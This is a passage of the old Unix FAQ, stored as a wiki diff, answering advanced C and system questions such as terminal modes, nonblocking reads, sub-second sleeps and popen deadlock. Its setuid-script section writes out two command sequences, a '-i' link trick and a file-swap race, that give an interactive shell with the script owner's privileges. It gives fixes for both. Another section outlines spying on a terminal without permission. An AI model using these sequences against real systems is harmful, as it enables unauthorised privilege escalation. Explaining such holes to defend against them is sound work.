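 * settings are stored in *saved so the caller can restore them.
 * Returns 0 on success, -1 on error (for example, fd is not a tty). */
int enter_cbreak(int fd, struct termios *saved)
{
    struct termios t;

    if (tcgetattr(fd, saved) == -1)
        return -1;
    t = *saved;
    t.c_lflag &= ~(tcflag_t)ICANON;  /* turn off canonical (line) mode */
    t.c_cc[VMIN] = 1;                /* read() waits for at least one byte */
    t.c_cc[VTIME] = 0;               /* ...with no inter-byte timeout */
    return tcsetattr(fd, TCSANOW, &t);
}

/* Restore the settings saved by enter_cbreak(). */
int leave_cbreak(int fd, const struct termios *saved)
{
    return tcsetattr(fd, TCSANOW, saved);
}
```

A caller would bracket its read of standard input with
enter_cbreak(STDIN_FILENO, &saved) and
leave_cbreak(STDIN_FILENO, &saved), taking care to restore the
terminal on every exit path.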
If you don't want to tackle setting the terminal parameters
|
||||
yourself (using the "ioctl(2)" system call) you can let the stty
|
||||
program do the work - but this is slow and inefficient, and you
|
||||
should change the code to do it right some time:
|
||||
|
||||
#include <stdio.h>
#include <stdlib.h>
|
||||
int main(void)
|
||||
{
|
||||
int c;
|
||||
|
||||
printf("Hit any character to continue\n");
|
||||
/*
|
||||
* ioctl() would be better here; only lazy
|
||||
* programmers do it this way:
|
||||
*/
|
||||
system("/bin/stty cbreak"); /* or "stty raw" */
|
||||
c = getchar();
|
||||
system("/bin/stty -cbreak");
|
||||
printf("Thank you for typing %c.\n", c);
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
||||
Several people have sent me various more correct solutions to
|
||||
this problem. I'm sorry that I'm not including any of them here,
|
||||
because they really are beyond the scope of this list.
|
||||
|
||||
You might like to check out the documentation for the "curses"
|
||||
library of portable screen functions. Often if you're interested
|
||||
in single-character I/O like this, you're also interested in
|
||||
doing some sort of screen display control, and the curses library
|
||||
provides various portable routines for both functions.
|
||||
|
||||
|
||||
|
||||
Subject: How do I check to see if there are characters to be read ... ?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.2) How do I check to see if there are characters to be read without
|
||||
actually reading?
|
||||
|
||||
Certain versions of UNIX provide ways to check whether characters
|
||||
are currently available to be read from a file descriptor. In
|
||||
BSD, you can use select(2). You can also use the FIONREAD ioctl,
|
||||
which returns the number of characters waiting to be read, but
|
||||
only works on terminals, pipes and sockets. In System V Release
|
||||
3, you can use poll(2), but that only works on streams. In Xenix
|
||||
- and therefore Unix SysV r3.2 and later - the rdchk() system call
|
||||
reports whether a read() call on a given file descriptor will block.
|
||||
|
||||
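For the select(2) case, a minimal sketch might look like the
following. It assumes a system where select() accepts any kind of
descriptor, and the function name input_ready() is invented for
this example. A zero timeout turns select() into a poll.

```c
#include <stddef.h>
#include <sys/select.h>
#include <sys/time.h>
#include <unistd.h>

/* Returns 1 if a read() on fd would not block right now, 0 if it
 * would block, and -1 on error. */
int input_ready(int fd)
{
    fd_set readfds;
    struct timeval tv;

    FD_ZERO(&readfds);
    FD_SET(fd, &readfds);
    tv.tv_sec = 0;              /* zero timeout: return immediately */
    tv.tv_usec = 0;
    return select(fd + 1, &readfds, NULL, NULL, &tv);
}
```

Note that "would not block" also covers end-of-file, so a result
of 1 does not by itself guarantee that data is waiting.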
There is no way to check whether characters are available to be
|
||||
read from a FILE pointer. (You could poke around inside stdio
|
||||
data structures to see if the input buffer is nonempty, but that
|
||||
wouldn't work since you'd have no way of knowing what will happen
|
||||
the next time you try to fill the buffer.)
|
||||
|
||||
Sometimes people ask this question with the intention of writing
|
||||
if (characters available from fd)
|
||||
read(fd, buf, sizeof buf);
|
||||
in order to get the effect of a nonblocking read. This is not
|
||||
the best way to do this, because it is possible that characters
|
||||
will be available when you test for availability, but will no
|
||||
longer be available when you call read. Instead, set the
|
||||
O_NDELAY flag (which is also called FNDELAY under BSD) using the
|
||||
F_SETFL option of fcntl(2). Older systems (Version 7, 4.1 BSD)
|
||||
don't have O_NDELAY; on these systems the closest you can get to
|
||||
a nonblocking read is to use alarm(2) to time out the read.
|
||||
|
||||
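A sketch of the fcntl(2) approach follows. It uses O_NONBLOCK,
the POSIX spelling of this flag, rather than O_NDELAY; that
substitution is an assumption about your system, as are the
function names. With O_NONBLOCK a read with nothing available
fails with EAGAIN, which can be told apart from end-of-file.

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* Switch fd to nonblocking mode, keeping its other status flags.
 * Returns 0 on success, -1 on error. */
int set_nonblocking(int fd)
{
    int flags = fcntl(fd, F_GETFL, 0);

    if (flags == -1)
        return -1;
    return fcntl(fd, F_SETFL, flags | O_NONBLOCK) == -1 ? -1 : 0;
}

/* Read without waiting.  Returns the byte count (0 means EOF),
 * -2 if nothing is available right now, or -1 on a real error. */
ssize_t read_if_ready(int fd, void *buf, size_t len)
{
    ssize_t n = read(fd, buf, len);

    if (n == -1 && (errno == EAGAIN || errno == EWOULDBLOCK))
        return -2;
    return n;
}
```

Because the test and the read are a single system call here, the
race described above cannot occur.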
|
||||
|
||||
Subject: How do I find the name of an open file?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.3) How do I find the name of an open file?
|
||||
|
||||
In general, this is too difficult. The file descriptor may
|
||||
be attached to a pipe or pty, in which case it has no name.
|
||||
It may be attached to a file that has been removed. It may
|
||||
have multiple names, due to either hard or symbolic links.
|
||||
|
||||
If you really need to do this (and be sure you have thought long
|
||||
and hard about it and decided that you have no choice),
|
||||
you can use find with the -inum and possibly -xdev option,
|
||||
or you can use ncheck, or you can recreate the functionality
|
||||
of one of these within your program. Just realize that
|
||||
searching a 600 megabyte filesystem for a file that may not
|
||||
even exist is going to take some time.
|
||||
|
||||
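If you do go down this road, the first step is to learn which
inode you are looking for. A minimal sketch, assuming fstat(2)
is available; the function name file_identity() is invented here:

```c
#include <sys/types.h>
#include <sys/stat.h>

/* Fetch the device and inode numbers that identify the file behind
 * the open descriptor fd.  Returns 0 on success, -1 on error. */
int file_identity(int fd, dev_t *dev, ino_t *ino)
{
    struct stat st;

    if (fstat(fd, &st) == -1)
        return -1;
    *dev = st.st_dev;   /* which filesystem the file lives on */
    *ino = st.st_ino;   /* the inode number within that filesystem */
    return 0;
}
```

The inode number is what you would hand to find's -inum option,
and the device number tells you which filesystem to search.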
|
||||
|
||||
Subject: How can an executing program determine its own pathname?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.4) How can an executing program determine its own pathname?
|
||||
|
||||
Your program can look at argv[0]; if it begins with a "/", it is
|
||||
probably the absolute pathname to your program, otherwise your
|
||||
program can look at every directory named in the environment
|
||||
variable PATH and try to find the first one that contains an
|
||||
executable file whose name matches your program's argv[0] (which
|
||||
by convention is the name of the file being executed). By
|
||||
concatenating that directory and the value of argv[0] you'd
|
||||
probably have the right name.
|
||||
|
||||
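The PATH search described above could be sketched roughly as
follows. The function name search_path() and its interface are
made up for this example, and it deliberately shares the
weakness of the method: it only guesses.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Look for an executable regular file called name in the
 * colon-separated directory list path (the format of $PATH).
 * On success the full pathname is written to out and 0 is
 * returned; otherwise -1 is returned.  An empty component
 * means the current directory, as it does in the shell. */
int search_path(const char *name, const char *path, char *out, size_t outlen)
{
    const char *p = path;

    while (p != NULL) {
        const char *colon = strchr(p, ':');
        size_t dirlen = colon ? (size_t)(colon - p) : strlen(p);
        struct stat st;
        int n;

        if (dirlen == 0)
            n = snprintf(out, outlen, "./%s", name);
        else
            n = snprintf(out, outlen, "%.*s/%s", (int)dirlen, p, name);

        /* Accept the first candidate that fits, exists, is a regular
         * file, and is executable by us. */
        if (n > 0 && (size_t)n < outlen &&
            stat(out, &st) == 0 && S_ISREG(st.st_mode) &&
            access(out, X_OK) == 0)
            return 0;

        p = colon ? colon + 1 : NULL;
    }
    return -1;
}
```

A program would typically call it as
search_path(argv[0], getenv("PATH"), buf, sizeof buf) after
checking that argv[0] does not already start with a "/" and that
PATH is actually set.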
You can't really be sure though, since it is quite legal for one
|
||||
program to exec() another with any value of argv[0] it desires.
|
||||
It is merely a convention that new programs are exec'd with the
|
||||
executable file name in argv[0].
|
||||
|
||||
For instance, purely a hypothetical example:
|
||||
|
||||
#include <stdio.h>
#include <unistd.h>
|
||||
int main(void)
|
||||
{
|
||||
execl("/usr/games/rogue", "vi Thesis", (char *)NULL);
|
||||
}
|
||||
|
||||
The executed program thinks its name (its argv[0] value) is
|
||||
"vi Thesis". (Certain other programs might also think that
|
||||
the name of the program you're currently running is "vi Thesis",
|
||||
but of course this is just a hypothetical example, don't
|
||||
try it yourself :-)
|
||||
|
||||
|
||||
|
||||
Subject: How do I use popen() to open a process for reading AND writing?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.5) How do I use popen() to open a process for reading AND writing?
|
||||
|
||||
The problem with trying to pipe both input and output to an
|
||||
arbitrary slave process is that deadlock can occur, if both
|
||||
processes are waiting for not-yet-generated input at the same
|
||||
time. Deadlock can be avoided only by having BOTH sides follow a
|
||||
strict deadlock-free protocol, but since that requires
|
||||
cooperation from the processes it is inappropriate for a
|
||||
popen()-like library function.
|
||||
|
||||
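To make the problem concrete, here is a sketch of the naive
two-pipe arrangement. The name popen2() is invented for this
example and is not a standard function. It works as long as the
two processes agree on who talks when, and it can hang in exactly
the way described above when they do not.

```c
#include <sys/types.h>
#include <unistd.h>

/* Start cmd under /bin/sh with its stdin and stdout connected to
 * pipes.  On success returns the child's pid and stores the parent's
 * ends in *to_child (write here) and *from_child (read here).
 * Returns -1 on error.  Assumes descriptors 0 and 1 are already
 * open in the calling process. */
pid_t popen2(const char *cmd, int *to_child, int *from_child)
{
    int in[2], out[2];   /* in: parent -> child, out: child -> parent */
    pid_t pid;

    if (pipe(in) == -1)
        return -1;
    if (pipe(out) == -1) {
        close(in[0]); close(in[1]);
        return -1;
    }
    pid = fork();
    if (pid == -1) {
        close(in[0]); close(in[1]);
        close(out[0]); close(out[1]);
        return -1;
    }
    if (pid == 0) {                       /* child */
        dup2(in[0], STDIN_FILENO);
        dup2(out[1], STDOUT_FILENO);
        close(in[0]); close(in[1]);
        close(out[0]); close(out[1]);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);                       /* only reached if exec failed */
    }
    close(in[0]);                         /* parent keeps the other ends */
    close(out[1]);
    *to_child = in[1];
    *from_child = out[0];
    return pid;
}
```

If the parent writes a large amount before reading anything, and
the child does the same, both block on full pipes and neither
ever gets to read. Nothing in popen2() itself can prevent that.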
The 'expect' distribution includes a library of functions that a
|
||||
C programmer can call directly. One of the functions does the
|
||||
equivalent of a popen for both reading and writing. It uses ptys
|
||||
rather than pipes, and has no deadlock problem. It's portable to
|
||||
both BSD and SV. See question 3.9 for more about 'expect'.
|
||||
|
||||
|
||||
|
||||
Subject: How do I sleep() in a C program for less than one second?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.6) How do I sleep() in a C program for less than one second?
|
||||
|
||||
The first thing you need to be aware of is that all you can
|
||||
specify is a MINIMUM amount of delay; the actual delay will
|
||||
depend on scheduling issues such as system load, and could be
|
||||
arbitrarily large if you're unlucky.
|
||||
|
||||
There is no standard library function that you can count on in
|
||||
all environments for "napping" (the usual name for short
|
||||
sleeps). Some environments supply a "usleep(n)" function which
|
||||
suspends execution for n microseconds. If your environment
|
||||
doesn't support usleep(), here are a couple of implementations
|
||||
for BSD and System V environments.
|
||||
|
||||
The following code is adapted from Doug Gwyn's System V emulation
|
||||
support for 4BSD and exploits the 4BSD select() system call.
|
||||
Doug originally called it 'nap()'; you probably want to call it
|
||||
"usleep()":
|
||||
|
||||
/*
|
||||
usleep -- support routine for 4.2BSD system call emulations
|
||||
last edit: 29-Oct-1984 D A Gwyn
|
||||
*/
|
||||
|
||||
extern int select();
|
||||
|
||||
int
|
||||
usleep( usec ) /* returns 0 if ok, else -1 */
|
||||
long usec; /* delay in microseconds */
|
||||
{
|
||||
static struct /* `timeval' */
|
||||
{
|
||||
long tv_sec; /* seconds */
|
||||
long tv_usec; /* microsecs */
|
||||
} delay; /* _select() timeout */
|
||||
|
||||
delay.tv_sec = usec / 1000000L;
|
||||
delay.tv_usec = usec % 1000000L;
|
||||
|
||||
return select( 0, (long *)0, (long *)0, (long *)0, &delay );
|
||||
}
|
||||
|
||||
On System V you might do it this way:
|
||||
|
||||
/*
|
||||
subsecond sleeps for System V - or anything that has poll()
|
||||
Don Libes, 4/1/1991
|
||||
|
||||
The BSD analog to this function is defined in terms of
|
||||
microseconds while poll() is defined in terms of milliseconds.
|
||||
For compatibility, this function provides accuracy "over the long
|
||||
run" by truncating actual requests to milliseconds and
|
||||
accumulating microseconds across calls with the idea that you are
|
||||
probably calling it in a tight loop, and that over the long run,
|
||||
the error will even out.
|
||||
|
||||
If you aren't calling it in a tight loop, then you almost
|
||||
certainly aren't making microsecond-resolution requests anyway,
|
||||
in which case you don't care about microseconds. And if you did,
|
||||
you wouldn't be using UNIX anyway because random system
|
||||
indigestion (i.e., scheduling) can make mincemeat out of any
|
||||
timing code.
|
||||
|
||||
Returns 0 if successful timeout, -1 if unsuccessful.
|
||||
|
||||
*/
|
||||
|
||||
#include <poll.h>
|
||||
|
||||
int
|
||||
usleep(usec)
|
||||
unsigned int usec; /* microseconds */
|
||||
{
|
||||
static int subtotal = 0; /* microseconds */
|
||||
int msec; /* milliseconds */
|
||||
|
||||
/* 'foo' is only here because some versions of 5.3 have
|
||||
* a bug where the first argument to poll() is checked
|
||||
* for a valid memory address even if the second argument is 0.
|
||||
*/
|
||||
struct pollfd foo;
|
||||
|
||||
subtotal += usec;
|
||||
/* if less than 1 msec request, do nothing but remember it */
|
||||
if (subtotal < 1000) return(0);
|
||||
msec = subtotal/1000;
|
||||
subtotal = subtotal%1000;
|
||||
return poll(&foo,(unsigned long)0,msec);
|
||||
}
|
||||
|
||||
Another possibility for nap()ing on System V, and probably other
|
||||
non-BSD Unices is Jon Zeeff's s5nap package, posted to
|
||||
comp.sources.misc, volume 4. It does require installing a
|
||||
device driver, but works flawlessly once installed. (Its
|
||||
resolution is limited to the kernel HZ value, since it uses the
|
||||
kernel delay() routine.)
|
||||
|
||||
Many newer versions of Unix have a nanosleep function.
|
||||
|
||||
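Where nanosleep() is available, a wrapper with the same
microsecond interface as the routines above might look like
this. It is a sketch only; the name sleep_usec() is invented
here, and the remark about minimum delays still applies.

```c
#include <errno.h>
#include <time.h>

/* Sleep for at least usec microseconds, resuming the sleep if a
 * signal interrupts it.  Returns 0 on success, -1 on error. */
int sleep_usec(unsigned long usec)
{
    struct timespec req, rem;

    req.tv_sec = (time_t)(usec / 1000000UL);
    req.tv_nsec = (long)(usec % 1000000UL) * 1000L;  /* usec -> nsec */

    while (nanosleep(&req, &rem) == -1) {
        if (errno != EINTR)
            return -1;
        req = rem;          /* carry on with the time still remaining */
    }
    return 0;
}
```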
|
||||
|
||||
Subject: How can I get setuid shell scripts to work?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.7) How can I get setuid shell scripts to work?
|
||||
|
||||
[ This is a long answer, but it's a complicated and frequently-asked
|
||||
question. Thanks to Maarten Litmaath for this answer, and
|
||||
for the "indir" program mentioned below. ]
|
||||
|
||||
Let us first assume you are on a UNIX variant (e.g. 4.3BSD or
|
||||
SunOS) that knows about so-called `executable shell scripts'.
|
||||
Such a script must start with a line like:
|
||||
|
||||
#!/bin/sh
|
||||
|
||||
The script is called `executable' because just like a real (binary)
|
||||
executable it starts with a so-called `magic number' indicating
|
||||
the type of the executable. In our case this number is `#!' and
|
||||
the OS takes the rest of the first line as the interpreter for
|
||||
the script, possibly followed by 1 initial option like:
|
||||
|
||||
#!/bin/sed -f
|
||||
|
||||
Suppose this script is called `foo' and is found in /bin,
|
||||
then if you type:
|
||||
|
||||
foo arg1 arg2 arg3
|
||||
|
||||
the OS will rearrange things as though you had typed:
|
||||
|
||||
/bin/sed -f /bin/foo arg1 arg2 arg3
|
||||
|
||||
There is one difference though: if the setuid permission bit for
|
||||
`foo' is set, it will be honored in the first form of the
|
||||
command; if you really type the second form, the OS will honor
|
||||
the permission bits of /bin/sed, which is not setuid, of course.
|
||||
|
||||
----------
|
||||
|
||||
OK, but what if my shell script does NOT start with such a `#!'
|
||||
line or my OS does not know about it?
|
||||
|
||||
Well, if the shell (or anybody else) tries to execute it, the OS
|
||||
will return an error indication, as the file does not start with
|
||||
a valid magic number. Upon receiving this indication the shell
|
||||
ASSUMES the file to be a shell script and gives it another try:
|
||||
|
||||
/bin/sh shell_script arguments
|
||||
|
||||
But we have already seen that a setuid bit on `shell_script' will
|
||||
NOT be honored in this case!
|
||||
|
||||
----------
|
||||
|
||||
Right, but what about the security risks of setuid shell scripts?
|
||||
|
||||
Well, suppose the script is called `/etc/setuid_script', starting
|
||||
with:
|
||||
|
||||
#!/bin/sh
|
||||
|
||||
Now let us see what happens if we issue the following commands:
|
||||
|
||||
$ cd /tmp
|
||||
$ ln /etc/setuid_script -i
|
||||
$ PATH=.
|
||||
$ -i
|
||||
|
||||
We know the last command will be rearranged to:
|
||||
|
||||
/bin/sh -i
|
||||
|
||||
But this command will give us an interactive shell, setuid to the
|
||||
owner of the script!
|
||||
Fortunately this security hole can easily be closed by making the
|
||||
first line:
|
||||
|
||||
#!/bin/sh -
|
||||
|
||||
The `-' signals the end of the option list: the next argument `-i'
|
||||
will be taken as the name of the file to read commands from, just
|
||||
like it should!
|
||||
|
||||
---------
|
||||
|
||||
There are more serious problems though:
|
||||
|
||||
$ cd /tmp
|
||||
$ ln /etc/setuid_script temp
|
||||
$ nice -20 temp &
|
||||
$ mv my_script temp
|
||||
|
||||
The third command will be rearranged to:
|
||||
|
||||
nice -20 /bin/sh - temp
|
||||
|
||||
As this command runs so slowly, the fourth command might be able
|
||||
to replace the original `temp' with `my_script' BEFORE `temp' is
|
||||
opened by the shell! There are 4 ways to fix this security hole:
|
||||
|
||||
1) let the OS start setuid scripts in a different, secure way
|
||||
- System V R4 and 4.4BSD use the /dev/fd driver to pass the
|
||||
interpreter a file descriptor for the script
|
||||
|
||||
2) let the script be interpreted indirectly, through a frontend
|
||||
that makes sure everything is all right before starting the
|
||||
real interpreter - if you use the `indir' program from
|
||||
comp.sources.unix the setuid script will look like this:
|
||||
|
||||
#!/bin/indir -u
|
||||
#?/bin/sh /etc/setuid_script
|
||||
|
||||
3) make a `binary wrapper': a real executable that is setuid and
|
||||
whose only task is to execute the interpreter with the name of
|
||||
the script as an argument
|
||||
|
||||
4) make a general `setuid script server' that tries to locate the
|
||||
requested `service' in a database of valid scripts and upon
|
||||
success will start the right interpreter with the right
|
||||
arguments.
|
||||
|
||||
---------
|
||||
|
||||
Now that we have made sure the right file gets interpreted, are
|
||||
there any risks left?
|
||||
|
||||
Certainly! For shell scripts you must not forget to set the PATH
|
||||
variable to a safe path explicitly. Can you figure out why?
|
||||
Also there is the IFS variable that might cause trouble if not
|
||||
set properly. Other environment variables might turn out to
|
||||
compromise security as well, e.g. SHELL... Furthermore you must
|
||||
make sure the commands in the script do not allow interactive
|
||||
shell escapes! Then there is the umask which may have been set
|
||||
to something strange...
|
||||
|
||||
Etcetera. You should realise that a setuid script `inherits' all
|
||||
the bugs and security risks of the commands that it calls!
|
||||
|
||||
All in all we get the impression setuid shell scripts are quite a
|
||||
risky business! You may be better off writing a C program instead!
|
||||
|
||||
|
||||
|
||||
Subject: How can I find out which user or process has a file open ... ?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.8) How can I find out which user or process has a file open or is using
|
||||
a particular file system (so that I can unmount it?)
|
||||
|
||||
Use fuser (system V), fstat (BSD), ofiles (public domain) or
|
||||
pff (public domain). These programs will tell you various things
|
||||
about processes using particular files.
|
||||
|
||||
A port of the 4.3 BSD fstat to Dynix, SunOS and Ultrix
|
||||
can be found in archives of comp.sources.unix, volume 18.
|
||||
|
||||
pff is part of the kstuff package, and works on quite a few systems.
|
||||
Instructions for obtaining kstuff are provided in question 3.10.
|
||||
|
||||
I've been informed that there is also a program called lsof. I
|
||||
don't know where it can be obtained.
|
||||
|
||||
Michael Fink <Michael.Fink@uibk.ac.at> adds:
|
||||
|
||||
If you are unable to unmount a file system for which above tools
|
||||
do not report any open files make sure that the file system that
|
||||
you are trying to unmount does not contain any active mount
|
||||
points (df(1)).
|
||||
|
||||
|
||||
|
||||
Subject: How do I keep track of people who are fingering me?
|
||||
From: Jonathan I. Kamens
|
||||
From: malenovi@plains.NoDak.edu (Nikola Malenovic)
|
||||
Date: Thu, 29 Sep 1994 07:28:37 -0400
|
||||
|
||||
4.9) How do I keep track of people who are fingering me?
|
||||
|
||||
Generally, you can't find out the userid of someone who is
|
||||
fingering you from a remote machine. You may be able to
|
||||
find out which machine the remote request is coming from.
|
||||
One possibility, if your system supports it and assuming
|
||||
the finger daemon doesn't object, is to make your .plan file a
|
||||
"named pipe" instead of a plain file. (Use 'mknod' to do this.)
|
||||
|
||||
You can then start up a program that will open your .plan file
|
||||
for writing; the open will block until some other process (namely
|
||||
fingerd) opens the .plan for reading. Now you can feed whatever you
|
||||
want through this pipe, which lets you show different .plan
|
||||
information every time someone fingers you. One program for
|
||||
doing this is the "planner" package in volume 41 of the
|
||||
comp.sources.misc archives.
|
||||
|
||||
Of course, this may not work at all if your system doesn't
|
||||
support named pipes or if your local fingerd insists
|
||||
on having plain .plan files.
|
||||
|
||||
Your program can also take the opportunity to look at the output
|
||||
of "netstat" and spot where an incoming finger connection is
|
||||
coming from, but this won't get you the remote user.
|
||||
|
||||
Getting the remote userid would require that the remote site be
|
||||
running an identity service such as RFC 931. There are now three
|
||||
RFC 931 implementations for popular BSD machines, and several
|
||||
applications (such as the wuarchive ftpd) supporting the server.
|
||||
For more information join the rfc931-users mailing list,
|
||||
rfc931-users-request@kramden.acf.nyu.edu.
|
||||
|
||||
There are three caveats relating to this answer. The first is
|
||||
that many NFS systems won't recognize the named pipe correctly.
|
||||
This means that trying to read the pipe on another machine will
|
||||
either block until it times out, or see it as a zero-length file,
|
||||
and never print it.
|
||||
|
||||
The second problem is that on many systems, fingerd checks that
|
||||
the .plan file contains data (and is readable) before trying to
|
||||
read it. This will cause remote fingers to miss your .plan file
|
||||
entirely.
|
||||
|
||||
The third problem is that a system that supports named pipes
|
||||
usually has a fixed number of named pipes available on the
|
||||
system at any given time - check the kernel config file and
|
||||
FIFOCNT option. If the number of pipes on the system exceeds the
|
||||
FIFOCNT value, the system blocks new pipes until somebody frees
|
||||
the resources. The reason for this is that buffers are allocated
|
||||
in non-paged memory.
|
||||
|
||||
|
||||
|
||||
Subject: Is it possible to reconnect a process to a terminal ... ?
|
||||
Date: Thu Mar 18 17:16:55 EST 1993
|
||||
|
||||
4.10) Is it possible to reconnect a process to a terminal after it has
|
||||
been disconnected, e.g. after starting a program in the background
|
||||
and logging out?
|
||||
|
||||
Most variants of Unix do not support "detaching" and "attaching"
|
||||
processes, as operating systems such as VMS and Multics support.
|
||||
However, there are three freely redistributable packages which can
|
||||
be used to start processes in such a way that they can be later
|
||||
reattached to a terminal.
|
||||
|
||||
The first is "screen," which is described in the
|
||||
comp.sources.unix archives as "Screen, multiple windows on a CRT"
|
||||
(see the "screen-3.2" package in comp.sources.misc, volume 28.)
|
||||
This package will run on at least BSD, System V r3.2 and SCO UNIX.
|
||||
|
||||
The second is "pty," which is described in the comp.sources.unix
|
||||
archives as a package to "Run a program under a pty session" (see
|
||||
"pty" in volume 23). pty is designed for use under BSD-like
|
||||
systems only.
|
||||
|
||||
The third is "dislocate," which is a script that comes with the
|
||||
expect distribution. Unlike the previous two, this should run on
|
||||
all UNIX versions. Details on getting expect can be found in
|
||||
question 3.9.
|
||||
|
||||
None of these packages is retroactive, i.e. you must have
|
||||
started a process under screen or pty in order to be able to
|
||||
detach and reattach it.
|
||||
|
||||
|
||||
|
||||
Subject: Is it possible to "spy" on a terminal ... ?
|
||||
Date: Wed, 28 Dec 1994 18:35:00 -0500
|
||||
|
||||
4.11) Is it possible to "spy" on a terminal, displaying the output
|
||||
that's appearing on it on another terminal?
|
||||
|
||||
There are a few different ways you can do this, although none
|
||||
of them is perfect:
|
||||
|
||||
* kibitz allows two (or more) people to interact with a shell
|
||||
(or any arbitrary program). Uses include:
|
||||
|
||||
- watching or aiding another person's terminal session;
|
||||
- recording a conversation while retaining the ability to
|
||||
scroll backwards, save the conversation, or even edit it
|
||||
while in progress;
|
||||
- teaming up on games, document editing, or other cooperative
|
||||
tasks where each person has strengths and weaknesses that
|
||||
complement one another.
|
||||
|
||||
kibitz comes as part of the expect distribution. See question 3.9.
|
||||
|
||||
kibitz requires permission from the person to be spied upon. To
|
||||
spy without permission requires less pleasant approaches:
|
||||
|
||||
* You can write a program that rummages through kernel structures
|
||||
and watches the output buffer for the terminal in question,
|
||||
displaying characters as they are output. This, obviously, is
|
||||
not something that should be attempted by anyone who does not
|
||||
have experience working with the Unix kernel. Furthermore,
|
||||
whatever method you come up with will probably be quite
|
||||
non-portable.
|
||||
|
||||
* If you want to do this to a particular hard-wired terminal all
|
||||
the time (e.g. if you want operators to be able to check the
|
||||
console terminal of a machine from other machines), you can
|
||||
actually splice a monitor into the cable for the terminal. For
|
||||
example, plug the monitor output into another machine's serial
|
||||
port, and run a program on that port that stores its input
|
||||
somewhere and then transmits it out *another* port, this one
|
||||
really going to the physical terminal. If you do this, you have
|
||||
to make sure that any output from the terminal is transmitted
|
||||
back over the wire, although if you splice only into the
|
||||
computer->terminal wires, this isn't much of a problem. This is
|
||||
not something that should be attempted by anyone who is not very
|
||||
familiar with terminal wiring and such.
|
||||
|
||||
* The latest version of screen includes a multi-user mode.
|
||||
Some details about screen can be found in question 4.10.
|
||||
|
||||
* If the system being used has streams (SunOS, SVR4), the advise
|
||||
program that was posted in volume 28 of comp.sources.misc can
|
||||
be used. AND it doesn't require that it be run first (you do
|
||||
have to configure your system in advance to automatically push
|
||||
the advise module on the stream whenever a tty or pty is opened).
|
||||
|
||||
------------------------------
|
||||
|
||||
End of unix/faq Digest part 4 of 7
|
||||
**********************************
|
||||
|
||||
--
|
||||
Ted Timar - tmatimar@isgtec.com
|
||||
ISG Technologies Inc., 6509 Airport Road, Mississauga, Ontario, Canada L4V 1S7
|
||||
@@ -0,0 +1,292 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:10:14+08:00
|
||||
|
||||
====== Unix - Frequently Asked Questions (5-7) ======
|
||||
Created Tuesday 07 June 2011
|
||||
Message-ID: <unix-faq/faq/part5_1084272547@rtfm.mit.edu>
|
||||
X-Last-Updated: 1996/06/11
|
||||
From: tmatimar@isgtec.com (Ted Timar)
|
||||
Newsgroups: comp.unix.questions, comp.unix.shell
|
||||
Subject: Unix - Frequently Asked Questions (5/7) [Frequent posting]
|
||||
Date: 11 May 2004 10:50:00 GMT
|
||||
|
||||
Archive-name: unix-faq/faq/part5
|
||||
Version: $Id: part5,v 2.9 1996/06/11 13:07:56 tmatimar Exp $
|
||||
|
||||
These seven articles contain the answers to some Frequently Asked
|
||||
Questions often seen in comp.unix.questions and comp.unix.shell.
|
||||
Please don't ask these questions again, they've been answered plenty
|
||||
of times already - and please don't flame someone just because they may
|
||||
not have read this particular posting. Thank you.
|
||||
|
||||
This collection of documents is Copyright (c) 1994, Ted Timar, except
|
||||
Part 6, which is Copyright (c) 1994, Pierre Lewis and Ted Timar.
|
||||
All rights reserved. Permission to distribute the collection is
|
||||
hereby granted providing that distribution is electronic, no money
|
||||
is involved, reasonable attempts are made to use the latest version
|
||||
and all credits and this copyright notice are maintained.
|
||||
Other requests for distribution will be considered. All reasonable
|
||||
requests will be granted.
|
||||
|
||||
All information here has been contributed with good intentions, but
|
||||
none of it is guaranteed either by the contributors or myself to be
|
||||
accurate. The users of this information take all responsibility for
|
||||
any damage that may occur.
|
||||
|
||||
Many FAQs, including this one, are available on the archive site
|
||||
rtfm.mit.edu in the directory pub/usenet/news.answers.
|
||||
The name under which a FAQ is archived appears in the "Archive-Name:"
|
||||
line at the top of the article. This FAQ is archived as
|
||||
"unix-faq/faq/part[1-7]".
|
||||
|
||||
These articles are divided approximately as follows:
|
||||
|
||||
1.*) General questions.
|
||||
2.*) Relatively basic questions, likely to be asked by beginners.
|
||||
3.*) Intermediate questions.
|
||||
4.*) Advanced questions, likely to be asked by people who thought
|
||||
they already knew all of the answers.
|
||||
5.*) Questions pertaining to the various shells, and the differences.
|
||||
6.*) An overview of Unix variants.
|
||||
7.*) A comparison of configuration management systems (RCS, SCCS).
|
||||
|
||||
This article includes answers to:
|
||||
|
||||
5.1) Can shells be classified into categories?
|
||||
5.2) How do I "include" one shell script from within another
|
||||
shell script?
|
||||
5.3) Do all shells have aliases? Is there something else that
|
||||
can be used?
|
||||
5.4) How are shell variables assigned?
|
||||
5.5) How can I tell if I am running an interactive shell?
|
||||
5.6) What "dot" files do the various shells use?
|
||||
5.7) I would like to know more about the differences between the
|
||||
various shells. Is this information available some place?
|
||||
|
||||
If you're looking for the answer to, say, question 5.5, and want to skip
|
||||
everything else, you can search ahead for the regular expression "^5.5)".
|
||||
|
||||
While these are all legitimate questions, they seem to crop up in
|
||||
comp.unix.questions or comp.unix.shell on an annual basis, usually
|
||||
followed by plenty of replies (only some of which are correct) and then
|
||||
a period of griping about how the same questions keep coming up. You
|
||||
may also like to read the monthly article "Answers to Frequently Asked
|
||||
Questions" in the newsgroup "news.announce.newusers", which will tell
|
||||
you what "UNIX" stands for.
|
||||
|
||||
With the variety of Unix systems in the world, it's hard to guarantee
|
||||
that these answers will work everywhere. Read your local manual pages
|
||||
before trying anything suggested here. If you have suggestions or
|
||||
